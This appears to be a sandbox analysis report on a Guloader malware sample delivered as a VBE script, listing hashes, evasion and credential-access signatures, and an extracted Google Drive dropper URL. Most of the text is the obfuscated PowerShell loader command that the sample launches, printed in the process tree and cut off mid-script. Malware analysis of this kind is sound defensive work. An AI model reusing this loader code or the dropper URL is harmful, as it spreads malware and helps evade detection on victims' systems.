Analysis

  • max time kernel
    71s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    02-02-2023 11:29

General

  • Target

    transferencia.....vbe

  • Size

    60KB

  • MD5

    880b795347b76a1660b3dfcae7bc28f7

  • SHA1

    dd398c1781ddd4f3e69036f4dadde6c643cacd44

  • SHA256

    c1435f8fc9a6ffb253811a74d4016f73248b7226d6d5b458c3bf960ee3a38005

  • SHA512

    e3ff92ca5ed3cc63bd8e1213a79dfc2574e0e39a126ece3d5890062eccc56ba23efe8f4301e71e3ad1fd3b1f88f9253e8d16d3fe0b73d5e78530f25cd80a7ccc

  • SSDEEP

    768:FlRe1yyO99pKzl2VT1Gxxy4tH/dD/ASEGZU2L7Y+yk10iGfzi945EriK:F3GyvLpylJxdfawKQNVMErd

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\transferencia.....vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Windows\System32\cmd.exe
      cmd /c echo shell
      2⤵
        PID:1636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ligh = """BlFUfuHanNycButVoiSaoSpnOu MyHFdTUbBSv Sv{Sk Vt Sp Af SkpSkaPrrOsaHomTr(Su[NoSEntBarLyiSpnNegLe]De`$BeuFoeTigKvePsnFonImyAdtOftKuiPh)Ud;me Ak`$KaECikGesShaHomUn Ki=Sy es'Pr'No;Ki UnWTrrFoiFatMieLo-GrHEuoBosNutSt Pa`$ciERnkUnsUdaImmFe;Ca BeWCorMaiSetPleMu-SpHUnoGesEntLo Ru`$WeECokCesAcaSpmMa;Fo SkWSyrMaiaftDoeUr-SkHOpoSksPltpr Ad`$CaEMekAlsShaTamUd;In Si Si Di St`$FlUSonsehdiaWasTitMaiLs Fi=Ce VeNCheBrwSt-tyOPrbAfjBreEncBltdi LibSoyArtBaeSp[No]No To(Ca`$AnuEveFagQueDenAvnAlyDitArtShiSe.MeLAreMintegHotUphOv Fo/Mo Fl2Br)Pr;Ta Fo Io Ko WiFPioPorAs(ni`$AmMGeePlnPadGeiSpcanpNilFiaTinBatLa2Ov1Du6Sl=Hr0Te;so fa`$FoMPleOrnKodToiOvcKrpTalpeaBanPatCh2Bo1Di6Se Ca-DolBrtsi sy`$GuuMeeVagUnePandinHaysmtFltTaiQu.ArLAreAfnTigbetUnhSe;Op ma`$beMFaeLinPrdMoiTucBapSelTrahanEgtub2Ly1Ak6Sy+Un=No2Di)um{Ar So Is Om Sp Sk Ra Tr In`$haUTanSahUhaAgsThtUniIn[Ha`$doMSteKnnBodFoiTucImpDilsvaRanBitho2Ph1Br6Fo/Ol2ta]Be Fe=Ma Ok[KucGroDinMivBreCarVitAc]In:Up:FrTHeoBaBReyMitKoeJe(ba`$AkuSkeSkgAueTenOunEkyMitRetEuiNo.OpSSluBebFisAgtHirGoiHynTigTr(Un`$UsMgreunnVedHeiSncBrpSelDraAvnGotNo2Oa1Jo6To,Na Bo2Sk)Ti,Ka Gr1Fo6Ba)Kv;Th St Br`$PeUEjnWhhThaChsHetSpiEn[ri`$SpMSieBrnTadAaicacDepTylUnaGanHotDi2St1Ba6An/Ul2Pr]De Ne=Lu En(Hy`$TrUPonEahWiaFlsOttNoiSu[Mg`$TrMBeePlnRedKuiSkcRepBulSuaApncatFo2Ov1od6Un/Ti2St]Es Se-HebUnxFloArrCh Di2Re1Kl0Ka)Wi;ae Ge Be Ru bu}Su Ro[CoSSntNurHeiSpnPrgHv]st[PnSYoyDesBetUdeAumBr.EqTDieTexSktEl.TiEVanRucGroHodOmiAtnBigUh]In:Su:GeAprSTrCCrIPeISl.FuGMieJutInSRetCarFoiAnnHygPu(Th`$FrUPenMuhOxatisJitDeiNo)fy;Sv}Ex`$SapBaobilFraGgrBaiBlsCoaCatSmiUd0Br=MyHGeTBaBIf Kr'Da8Re1MiAChBUuABe1DuAPe6EdBCo7LoBReFSnFTaCTeBCe6PiBHoEudBReEKl'Ov;Si`$BopAuotolSoaVirLliBosBiaJetSkiAu1Go=PiHOpTOsBBo Eu'Ko9TeFPrBGeBBaBHv1OnASe0ToBUsDAgASi1MiBSmDcyBRe4StABu6PuFJaCSo8Ar5HaBTeBViBReCMoESu1ReESy0FoFnaCVi8No7DiBMeCBeATe1YeBHu3MiBDe4FlBMu7So9VeCOcBFl3reARe6SaBBrBPrAPr4stBBr7Sa9TrFTeBUn7SoAag6NaBKvAAsBChDBaBCu6spAUl1An'Sa;As`$UnpCroBrlOpaRerOpiTosFiaEntLeiDe2An=ReHhuTReBhu Au'Ch9Th5AfBTh7SiAMi6ko8Ga2OrAMi0TiBCuDKnBOu1Ud9To3MiBba6BaBRe6TeAFr0TaBOp7ElAVa1PrAAl1Br'Mi;sp`$BopIdoUnlInaCarMaiMesKaaUntLeiAu3Va=SoHPeTBeBMi Fl'Pe8Hi1StABrBOuAje1hyALe6MoBGu7unBReFNoFLyCGo8Eq0FaAef7UdBFoCsaAVe6toBGrBPaBstFPrBba7BeFInCDe9SlBStBFaCTrAIn6NoBsk7PlATi0ScBLoDMaASh2Sa8Ti1AnBNi7WrAun0deAHy4PrBAlBMiBAn1OvBOr7AfAop1AdFFoCAb9InACaBDi3VaBClCPhBlo6MoBRoESjBUb7So8Ma0BuBRo7ArBFi4Do'Tr;Gl`$IlpCroSulDraAkrDiiloslgaPrtFoiEr4Ko=SkHTeTToBNe Sk'ugAPo1leAPr6TaATe0InBDeBGoBDeCdrBEn5Pe'Sp;Ev`$DepScoCalRaaKlrTaiNisSkaOvtTuiDe5Be=BaHCaTTiBIn Sc'Ri9Bi5HoBEs7BaAPh6pa9BeFskBNoDChBTe6DuAPh7RaBBlERoBCa7Ab9SaAKaBMi3ImBkrCElBWa6AbBprEudBAl7no'Un;Ph`$StpMeoUnlDeaVarReiPrsTraOutvaiEx6Fl=PlHprTKoBIn Li'Py8we0Du8Vr6Co8Oo1NiAOl2UnBBl7MaBCo1HeBsuBunBmu3luBSpEzy9FjCSpBBe3SvBAtFEvBTu7TiFAfEReFJo2Su9ZoAKaBSeBInBOm6ThBLi7Sk9ri0CuATeBVa8no1FoBFyBMoBUn5CoFDeEBaFPe2Th8Bu2LeABe7UnBGu0RaBTeEPnBFoBpiBBa1Aa'Ja;un`$SepDiokalSpaRirFoiCasPraVatStiMa7ca=PaHInTFsBSn Ra'Om8No0EmAWa7HyBMoCBaAIn6avBPaBAaBMaFTiBDr7LiFCoEGrFPo2Ma9SeFaaBHi3FoBKlCAfBLa3MaBpe5DiBTr7FoBHo6ga'Ko;Hy`$BrpSkoSalFeaAbrCliStsBaaPltMiiPr8Ba=ReHYaTKoBIn Re'Sy8Dr0LyBSc7ReBUv4zoBBeEbeBNr7KoBGl1CoAOs6EfBPl7ReBPh6Ak9Pr6FoBJu7KuBTaEAqBUn7BuBSt5GiBSi3HeAKr6GyBRe7Ta'Fi;sg`$bepTooColSmaUnrYdiGasToaCatEniBa9Ar=SaHTeTVrBPa Ag'Ls9VuBMoBNeCAd9heFCoBCh7ScBGiFafBAfDPiAFu0MiAReBGi9SmFPeBRaDInBTy6MeAUn7afBTrENoBFa7Fu'te;St`$KrYbiaOprAldPeiSt0Ri=VrHWoTStBMa Ka'ni9GaFFoAskBBl9Ma6StBGr7CoBTeEEkBLe7MeBst5PaBBu3BiADr6CoBDe7ka8Gl6KaARhBMuARe2DrBTe7Te'Au;In`$UlYTaaAdrKadSeiBr1Cr=TaHHoTGaBKv Ga'Zi9Bi1wrBMiEUnBCl3AfASc1CiAve1FiFOvEReFRi2an8Po2SlASu7MuBBv0PhBpeEduBFiBpeBMo1DiFChEGuFGy2El8Ti1UnBOn7AtBAs3InBKaEAcBGe7UdBWe6BiFEfELoFGt2mi9Wh3kuBPrCOvAHe1AfBBrBUn9Re1FaBLoEShBDi3GrAJo1ViAVa1HoFtrEFiFDe2Gi9Da3PaASk7HaATi6OoBUnDBl9Id1EnBtuESvBOv3OvAin1InAPa1Fa'Re;Ag`$KrYbraVerkrdreiSk2Kr=AvHReTSeBun ca'Dd9StBNeBBaCDiAPr4BrBfiDVeBEd9PsBDi7Ma'Er;Pr`$StYDaaMirRedBuiPr3Ko=AbHAcTpoBHo In'St8Gu2LrATo7PrBTe0ClBInEStBBaBRiBOv1ReFNyETrFVe2Gu9FoAReBUdBAvBki6DiBBy7No9Ab0FaADoBSa8no1AnBUdBReBUn5whFJaEAdFIn2Bl9PlCUnBTi7AdALi5So8Bu1BrBUiEprBMyDMaANo6UnFFuESeFfa2ud8Ou4QuBMoBSeABe0MaAeb6TaAVa7TuBVe3VaBPaESe'Ec;In`$SlYAtaClrAudMaifo4na=EsHBeTlaBDe Je'Tr8De4SeBBlBUnANo0ReAAr6FeAPa7AnBMi3PrBBeETo9ko3SqBReEPuBUnELiBFoDSaBMe1He'In;Ca`$ApYPuaAnrCodFriMi5Un=DiHMoTHaBAc St'JeBBeCBiATo6AdBCr6BeBciEOrBNoEen'Id;Mo`$SlYCraAurTodCriAf6Em=FiHDoTVaBMa Un'Pa9ByCUnASk6Au8Sa2JuABh0SuBBrDvaAFa6KoBLo7OpBUd1BlANo6fl8Wo4FaBSaBPeAZo0kaAAb6MuARe7ShBAl3jaBToEPh9ArFMeBBy7AfBHnFFiBSpDDeABu0SkAApBtp'Ho;Ba`$BeYLaaAdrHydFeiIn7St=UdHOrTEfBSp Tr'gn9MrBDe9An7sp8ReACo'Da;Is`$UpYMiaUnrIndRaiDe8Un=CiHFoTOeBZe Tr'Pe8UpEDu'Se;Db`$LiRFeuoubLnePefMoatocSotst=AnHVeTFoBAf Bl'Sa8Be7In8Ch1In9Or7Re8ci0HeETa1AsELe0to'Pi;Fo`$BrOafvFeeBerScpSp=TeHmeTGtBFi Ce'Dr9Bi1PeBMo3GeBApEUnBSpEir8Co5FrBSmBCiBGeCFeBSa6FeBPaDMiAkr5De8La2MoAAd0NoBChDUnBIm1Co9Ku3Un'Re;difPeusunEkcJotDaiDeoSlnBu FefUdkPrpGi Fr{PhPDeaDerAkaLamCo Sk(Sn`$VeDCheToyunsGroBosRapPo,Fl Pi`$HyETemLiaTwnFeaBetBoiEmsDi)Pa Un Un ra Hy Di;Ni`$UnvDiiUneWatHa0St Co=UfHTiTEkBMi Fo'ReFfr6Cl9NoAReBFo7SyATaAMoBKl3SkBRo7BiFca2BeESiFNoFPe2UnFchAFo8Fl9Re9El3teABo2TrAEk2Wa9El6GeBAuDFoBViFSyBKn3AkBPiBAdBCrCHe8noFLeESk8LnERe8Se9an1urAKr7StAfl0StADj0haBPr7DeBNuCSoAAn6Bu9In6stBUnDPaBMiFSuBCe3ReBHeBOmBSnCStFAfCUn9ap5DmBIn7otABa6st9Ja3PhAIn1UdACo1HyBTr7TiBslFGeBIn0UfBanEPaBSjBExBFo7SkAPa1PrFThAKhFFiBBeFWe2NoAUnESaFHj2Ge8Le5YnBLeAMeBPr7DeARe0AfBHu7PlFFoFSl9InDunBFo0ToBYo8StBwo7UnBRe1TyALa6FoFTr2crAPr9SeFre2ExFDi6Id8SkDGrFRiCUn9Ek5ScBKuEBoBRaDBeBAg0InBBy3IdBMiESa9Ra3leAHi1KaAov1TeBKe7OpBAnFEtBCi0ThBOrEetAPoBSu9Vi1IrBFe3vaBPa1UnBSnAOpBFa7NoFco2AnFDjFGo9Al3JvBOpCSeBUn6OpFDe2ReFRe6We8NoDSpFcoCrg9ToEkoBCrDFaBTy1BaBHo3AnAVe6InBHoBLuBHuDCeBFjCOpFWaCAf8Bo1AnAPr2inBJoEDdBCaBTlALi6LeFFaASkFHj6Me8HiBJeBIn3OfAMe0DoBMi6FuBBeBdoESmAIrFLyBGr8tu9LgFBlFSeESa3Mo8TeFReFAcCAc9Pa7LaAFu3DiABo7VaBNe3EkBurESaAMa1SaFSeAFoFOp6CoAin2HaBUnDReBTiECrBSk3KaAIr0UnBKaBSpAAg1ClBRe3NoASt6RaBBoBMyEBr2PrFTeBVeFBo2KoASoFedFMeBToFReCDe9No5InBCi7SlAIn6Fo8Re6ArABlBDaAPa2BeBBa7LsFPaAGeFUn6InAvi2joBSaDPlBGeEOxBBl3TyAKe0ElBHiBKaAAn1GrBWa3CiApr6TjBCaBCeEMe3StFRiBVo'Ko;Ma&Ba(Ge`$ErYReaTrrindAkiTa7Fo)Lu Se`$MivMeiGleUntBr0Sk;Te`$BavPaifreRatUn5Tr in=s OpHBoTDoBMu Mi'ScFVe6Ma8Ki1TeBMo9SeAPu0LiBMiBGrBSa6HaAMu6ReFGr2ReEFaFMcFla2NuFDe6Po9ScAJeBRa7ReABaAEsBEu3alBGe7unFOsCFi9hv5RiBCa7TeAFr6Cr9ReFVaBBo7ToAVi6BoBOvAEtBthDMiBMo6PeFEnABeFSt6UdASo2AnBMoDKrBReEDcBSt3MaAVr0DeBDeBFiAHa1FlBSt3MaASt6PrBPaBTvEPr0PlFHoEUnFRe2Pa8ds9Vo8Sg6OpAjoBStAHe2LaBat7Va8No9Ro8MiFSy8MaFheFFa2Un9Rr2OxFSpABaFAb6AbAHo2MoBHeDSlBHaESaBBe3ClAti0LuBSeBUaADi1HyBRi3VeAFo6AnBBrBSuEBl1BlFWaEFrFRe2InFBu6SaApe2CoBDaDFrBphEAnBUd3FiAIs0BaBtiBunAFi1BoBHu3AsAPl6CaBOnBOtEBr6OmFDeBGiFUnBSp'Ta;Se&Un(Fa`$DiYCoaUdrJedHyiSu7Tr)Lb Mo`$TevSqiLoeActLu5Da;Af`$tevPeiSaeNetDe1Ef Un=Gl FoHamTBdBMa Li'opAAs0scBGo7MyACh6AuAPt7MeAVe0ThBSpCLuFTy2GrFGe6Tu8Ly1HaBJe9ReADd0OvBZaBAaBJi6SaABr6ThFreCBi9AfBpeBJoCMeAAn4PrBHeDEvBTe9EsBSa7TaFDyAriFLo6WeBPaCLaANi7LeBPhEToBImEMuFExEPrFOb2Fi9Be2FoFApAVe8Pu9Ut8Pa1PiAGaBHyAFo1CaANi6DeBEl7SoBUnFUdFAdCLs8Dm0UnAUd7PlBMiCsvAPs6UdBViBMiBDeFPrBDu7SeFSaCIn9OuBbeBFjCDaAOu6SaBDe7StAbe0NoBunDGrABd2Sk8Fd1ClBBr7MyAGn0TrASn4RaBMaBUnBSu1LyBNo7HoAFl1GgFHsCse9TaAHtBKl3TrBCoCTiBLa6RuBTrEFoBRi7An8Ov0UnBEs7FeBAd4Af8miFneFsaAHv9soCMlBTa7LnAJe5KaFOuFCy9PaDamBYo0UdBSt8SeBAb7ChBSt1VuAPi6SoFUn2Ke8Af1BrAInBfeAPr1FoAor6IsBSk7HaBDiFChFElCUv8Ud0naASp7DiBFrCBaAca6EmBUnBstBBrFDdBNo7ReFSoCDe9WaBElBSiCKoAHa6HeBAx7BuAMe0OpBQuDduAIn2Re8Pu1diBPa7FrACe0EbABo4IdBHeBAdBLe1DiBBu7SaAva1FrFDiCSo9SwAHaBBa3ArBLeCInBUr6BiBslEIlBOp7St8Op0blBKo7KaBIn4LuFAmANeFLoASk9PuCHeBRd7ViAfi5GuFOpFFr9EnDLsBVi0GaBBe8DoBRe7SkBTa1ReAAd6VeFAv2Fa9TiBunBDeCRuAAi6ki8Sp2SkASy6SvASk0RaFTiBFiFTiESkFKl2inFRoAIgFFo6Ni9BaAAaBLa7LiACoABiBCr3CoBMe7BeFBiCTi9va5fiBTy7BrASo6St9MiFLaBHo7FaASp6VaBCrAFlBJuDInBPa6PlFPlAFrFNo6PaACr2KaBReDInBUnEGrBIn3BrAOp0KaBKnBimADi1ArBUn3AfADe6FlBTyBKrETy7NeFmaBEnFFoBKaFDeCex9PuBKlBLiCGrATo4AkBToDPrBBo9ChBMe7EmFDeAFaFco6RaBMaCFoAMi7DiBBrENaBSuEUrFPeEStFHa2Bi9Sk2PaFalAPhFUd6Os9Tr6SuBSt7BeABeBUnAKa1NoBThDAfAPo1BlAsi2ReFOvBSuFBoBSyFElBLoFJaBBaFCaELeFMi2ImFAt6so9Te7SkBCoFHsBMu3CeBHyCEvBFl3MoASg6TjBAnBenALo1HyFSkBPhFQuBSl'Mo;Du&Bo(br`$SaYreaPrrvadUniUn7St)Qu po`$EnvRaiHoeMetEq1fi;Im}AcfBauRvnDicPrtGgiDaoVinPu AtGPiDBuTOu Fl{HoPOpamarPoaInmGr cu(Nr[FlPIsaGirSkaAsmNyeDetDeetirBi(UsPEloCysanitatBaiFuoArnMa Pr=Av Ka0ba,St ByMToaBunUddcaaHetUnoMarDiyOu Tr=In Le`$UhTTerfruSeeMa)En]Ko No[SpTMayEppCoeKo[Tr]Ud]Al Jo`$ChPCaeUrnSasVaiMeoSenUn,Lu[SkPSvaAlrUbaClmReeBrtGaeDirMs(JoPLaoFrsDoibltAmiEmoHjnMi Or=Gu tr1No)Ho]No Ha[inTReyblpSreUn]Ov Le`$OmMGreBlnBrdEgiOpcCa en=Wa Me[MiVTaoTwiShdRe]He)Co;No`$MavopiReeFatNo2Fi Sk=Ju LeHMiTAnBHj Co'NeFAb6Ge8Ga0KiBFo7BeAOb1EpATr7BoAja0AvARe0VsFBr2VdEJoFFlFPr2In8Sa9Sy9Pa3IbADa2ByASt2Va9Vi6BiBCrDreBRuFcoBUn3SnBBrBMaBFlCSf8tuFshESu8DiELa8Fo9Fe1FiAPr7AiASu0UnAWi0JoBCr7piBScCarAKl6Di9St6ElBNoDSuBTiFalBSt3EdBFrBCaBUnCArFInCBi9Ic6PhBBi7crBtr4KlBBeBFdBMoCGuBpi7Sk9St6PoABeBUvBLaCgaBRe3spBSpFclBReBJiBDe1Fo9Mi3BrAAn1HlAJo1UnBba7CoBEkFJuBBi0BlBHaEsoAHoBBaFPrADrFkoAFe9LaCKrBPr7DyATa5AbFStFAl9MyDMaBCe0PrBId8KaBUr7SpBBr1DyACo6AfFEx2Nr8Sa1AlAViBSkAFl1KnANa6InBUn7FrBPlFBuFBeCKl8Na0LeBFo7ReBPr4GaBPlEAfBNe7PeBLi1ReAOu6GaBBeBSeBByDSuBFaCFoFSoCUn9Op3SkADm1LyAIn1soBSp7FiBOmFBeBMe0ExBUnEOxABlBPl9ScCAnBIn3ApBHjFDrBBe7CrFSuALsFSj6CrADo2LaBHyDEuBOpEElBBy3HoAun0SeBHjBseAAd1SpBSh3JeAMo6klBFhBNeECoALaFUnBSiFFeBbuFTaEMiFVa2ta8br9Di8mi1inABaBAnAKo1BdARe6BrBPr7ByBSuFafFSuCAc8Ra0AkBFo7KaBFg4OvBSaEScBBe7BlBEl1HaATa6YvBDeBUdBFnDHaBbiCAbFFaCCl9St7CuBScFImBdeBKoAFa6drFAnCLg9No3riALe1DiASk1KrBun7ReBChFAnBUn0RoBUnEHeAUnBSo9su0CaAUd7UrBPaBOmBKaEFoBBu6UtBHa7ThASe0No9Pe3UnBen1UdBTr1BoBWo7boATe1peATi1co8SeFMiEAu8MiELo8Hv8br0FoAch7teBDiCDrFssBUnFAwCFi9St6AvBCh7BaBSo4WiBSuBPlBReCReBRe7Ny9De6AcAOmBDoBFaCMaBIn3PiBFuFlaBLoBPoBSp1Ma9NoFJeBAlDChBIn6DiAPa7BiBSmENoBBe7TrFPaAByFRe6OpAFy2SmBDeDKrBCaEMeBDa3FrAKr0AcBJoBTrAHy1AbBAx3SuAIs6suBPnBOvEGaBHeFbrEExFgl2SkFto6SuBek4UnBCa3TiBNoEGlASy1ChBDe7ToFFoBFrFBaCEd9Ts6BoBka7BiBde4AsBUdBOvBTiCLiBkl7Th8Sa6FoAStBCaANa2ViBSp7OmFKrAMaFNi6Th8BrBSkBSv3StARy0AkBNu6BiBSmBOuEDe2MeFStELiFTr2AdFTi6Pa8BaBRiBTa3HoATr0seBRa6ReBskBRoEKk3FeFRaEFoFSa2Ha8Im9Ov8me1ShAViBLeAPh1FoAUn6BlBSt7KvBcoFloFDeCFe9UnFDeADe7TrBAfEmiACo6inBSuBTrBMi1HeBBl3GuAPe1BuAWh6Ar9so6EnBWo7GoBWrEkoBAv7meBsh5PiBSt3PaARe6BuBPr7In8SaFAfFOuBFi'Ti;In&Fa(Ud`$UlYGraChrgadapiRe7Br)Lo mi`$NevVeiOmematBr2Ma;Cr`$BovHuiSlePhtMi3gu Li=Af SaHNsTTrBRi Fr'ThFNu6Pr8Ca0StBCo7BoASk1BrAKo7SkASf0PiALn0AnFCeCIn9mi6enBRe7VoBHj4KoBOcBOtBSuCInBSp7Kr9Li1InBGeDByBGoCHyAFo1ViASa6BaAMa0BoAPa7ruBOv1CyAFr6udBsaDLaAHa0PlFAnAPrFRe6CyAPi2OvBTaDFoBTaEheBCo3FuAEs0SpBbrBSlAIn1HaBPo3KlADo6BrBZoBInEKo4DeFfiEHaFBi2op8ch9Ma8Il1InAmoBBoAPi1SnAMi6DoBco7ThBInFSkFWhCUn8St0MeBPu7LkBUn4KoBFiEMyBSo7FoBMe1SpASi6NaBSuBNiBAlDAcBLiCScFSpCno9lu1AnBUn3SkBKrEThBSjEjoBMaBEpBGrCCoBOr5Re9Ga1GrBPeDGaBOvCPaASa4PaBPr7HuBnoCfrABo6SaBFlBTiBTaDPaBAkCGlASa1Sp8SuFPrENo8AnEsk8te8Un1SkAEt6AfBFa3WaBInCNdBOk6SpBKm3CaAFr0CeBZo6NeFInEBiFUn2TyFHv6sl8Sk2FoBKm7NeBEfCDeAUn1VoBStBboBDaDWoBfaCSaFRiBFaFSpCUn8St1DiBTr7FeAId6di9ReBSeBImFDiADe2OcBImETuBDe7AvBUrFLaBBr7RuBCrCDiAFu6SlBlo3syAAn6DyBSpBUdBMiDLaBPnCJe9Of4PaBUdEBeBLy3OvBMe5UnARe1AnFAnASlFAf6ToAPo2AsBApDRiBOvEPrBco3BeAKa0niBBrBSkARi1BrBKr3PoALn6SaBFaBDaEBl5SiFsmBAp'Gr;Vi&Pu(By`$PiYUnaIlrsadBeiBe7Sc)An Ri`$TivCoiVgeCutCl3to;Sa`$SpvfoiMoeKotPl4An Or=Be PrHNoTPeBBa Ku'BeFAr6ya8Fo0EyBSt7MaAAk1RiASa7BeATa0BrAzy0SlFgeCEl9Ti6AnBLe7WiBSk4DiBBoBUnBTrCJuBMi7Ra9ibFNaBre7PuAUd6OmBboASaBFeDBuBla6HoFUnASpFSo6Ex8SkBPhBSa3UdAre0TeBCo6FiBInBJuEMe0prFskESiFBr2trFin6Wa8BeBFnBGu3ErATs0ZlBCi6AsBHaBCaETi1FoFArELiFRe2DeFFa6pr9DkFReBSm7WaBReCafBHa6PeBLuBLaBPr1AnFBiEGkFDi2InFBl6ar8In2SaBHu7StBReCFlASt1maBSkBRuBSiDJuBLeCSkFHyBMaFEmCpr8Fa1AcBMu7loABo6Ti9CaBVeBPiFChATu2DoBDeEReBRe7PrBSmFMiBSe7TiBAcCNeAAm6SaBRa3NeAFl6SpBDaBAsBPeDPuBHoCKo9Mo4NaBPhEUdBSh3DeBAm5plAGy1EpFBiAFlFPh6GaAKa2DeBClDPyBPrELyBBe3ElACo0SkBShBGeAIn1SkBSu3AsANs6VeBTeBPsERe5AfFCoBNi'De;at&Ve(Fo`$PlYOmaazrStdReiko7Tr)Ko Ou`$HavGeihoeDatdi4Ao;Wh`$BavMaiHyeFjtqu5Th Sa=La StHPoTErBHa Aa'BlASk0FoBSl7UnATr6SoADi7heAGe0DoBUnCDaFFa2TeFSa6Un8Hj0FoBKl7VeASu1AdATo7LaAKe0RoANa0BeFPrCIn9Tr1LaAAc0KiBAm7OuBAp3StAin6MaBDe7In8Mi6SvAPaBUdAEx2NaBUd7SkFMaAArFAsBKl'Pr;Hu&Em(Su`$SkYEsaCerThdSoiHy7Sa)St da`$SovVriNyetrtMt5ab Ov De Ma;Kn}Me`$MaMCooSpnProcogHurDoaFimSasSn Gy=Pa SuHInTUnBCu No'InBPi9CoBMa7OrABr0MaBSoCKrBLi7PrBLsEHeEKa1PhEOm0Ll'Su;ko`$BevStiPieGutUd6Wa Ke=Ti SkHStTRiBFr Pr'UnFSt6SoARe1MoBBa9ChABi7UnBFo7ceARe1SyANe2MeFFo2PiELiFSoFBu2Ph8To9Sk8Un1TvATiBMiATo1SlAMa6BlBNy7miBTiFNoFRuCAp8Be0AnAeq7BeBUdCmaASk6SuBFeBdiBGaFSpBGe7SqFViCKo9KuBSlBDiCAbATe6UnBFr7InAPr0EkBSkDHeAMa2Un8Ti1GlBDi7WrAFr0UdAHo4SkBGaBJaBKa1FrBRh7MaAAg1UnFOrCBl9MeFFuBko3StAFo0SuAMu1AlBfeADiBPa3ChBNoEPr8MeFReEBe8MaEPa8Di9Fr5ApBDi7SeALu6Fe9No6BaBKl7FoBTeEAnBDi7MaBIn5roBKa3ShAVe6NoBNo7Kl9Sv4poBBeDSuAbi0Py9Fl4AdADy7MaBMeCPaBOx1ThASt6InBHjBAnBveDOvBBuCSa8Re2SuBUfDSaBWoBHeBomCpoADr6PaBEk7AiABr0viFpaAInFPrAUdBRe4LuBEl9EpAOp2flFbr2MiFFo6Fc9TrFmoBIvDReBFoCDuBCaDToBMi5DaAGu0BrBFl3OmBPaFIsAKa1avFTe2EcFSt6Fr8BoBDkBMe3KaASk0SjBTh6BlBCeBPoEPo6BuFWoBReFCoEFrFAl2LaFDiAPl9Re5Jv9No6Ra8Co6SsFBa2in9Me2TeFSoAUm8Ba9St9FoBSwBSoCPeAMa6Eq8Sk2reAHf6ReACa0Pu8caFTuFLeEInFPh2Ha8Ag9Pe8Op7At9DiBMaBDiCBoAaf6SaESm1BoEFl0ri8NiFTyFPeEDiFKr2Ro8Cy9Co8Un7De9ChBKlBTeCSvACo6DoEUn1UnEWi0Di8HaFBoFCoEFeFFi2Tr8Be9Ho8Fi7Ri9KlBMaBViCNoATa6GnEUn1PrEbe0Ce8SnFLaFUdBPaFOv2FoFCeASl8Ti9Co9HaBHjBSpCSpAbo6Le8Ri2StAPr6OrATi0Il8tiFkuFGeBFoFReBSpFEfBOl'Uf;Do&Ve(Ox`$afYViaStrHadTriTi7Fi)St Ny`$CovBeiRyeAutLi6De;Me`$CaTPawBriBucLakMapChlFouAb Su=Ha StfOvkFipSy Mu`$StYGlaSarIsdsaiUn5Dr Tr`$UnYUnaHerShdBoipa6Re;mo`$OpvPaiNeetytHa7St Re=Mi tuHToTFiBFr Di'TrFAd6So8In0UnBGl7LaAUe1MuAFe6stBDe7SuELi1SiFUn2KnEReFMoFIn2FlFTa6VaAGr1ReBSa9KoAPa7MlBBr7JoASp1SpABu2SeFSyCPr9LeBYtBThCRaADi4UnBChDShBHa9BoBPo7CoFUdACo8Me9Id9SyBPrBThCNeADa6fi8Co2TrABr6UnADe0Ci8FoFHnESi8GrEMa8Gr8Va8FiBSt7BdAGe0KrBSpDHoFUdEhuFFi2FrEMa4brEGe6FoEaf3ReFStEVaFBo2ChEma2SeAReAEnETu1GaEEk2SkESv2InELy2PhFRoEUnFEg2TeEOv2MaABrAPrESo6MoESy2AfFBaBTu'Cr;Pe&ar(br`$BeYFraanrAndDoino7Tr)Or sp`$HovPeiCaeGetVr7Fa;Re`$BrvFriBieHetSt8No Re=Ka UnHDaTMoBRu Sp'PiFTr6Re8An0SmBKo7ReBPe3PtBSrEStBBl0AnBSy7SvBHy6dyBNe7SlBSeFHoFst2PeESiFSyFSk2VeFSn6HuAIm1PoBIv9AdADi7BoBCa7AdACo1FoAMe2VuFFoCcr9AnBDoBTrCarAMo4PuBVrDLiBWe9KoBPl7LeFHoAFo8Ja9Bo9PlBErBNeCViABe6El8Kr2FoANo6HyABr0Bo8HeFRiESa8UnETr8Ps8Re8CoBDa7MaAQu0SeBKrDOrFNoERiFKv2ObEEe4KoEAl7PaETr0VaEBr6GlEPu3SuEMo2SyEKaASuERaAAkFSoEkuFRu2SkESi2FaAtyAPrEWh1GrESl2GaEHd2OcEud2DiFBrEHaFTh2DeEUn2AfAEfAraEMa6GaFAnBRe'Ha;Fl&ko(Sa`$BaYSnaBirPrdHeiSk7Ha)Ba Fl`$VivBaiMeeSvtJa8Io;Sa`$YaSIttOvrEvmTreTrrBaeSlnDisKa1Mi3Al9Bo0Br1Bi Me=Un 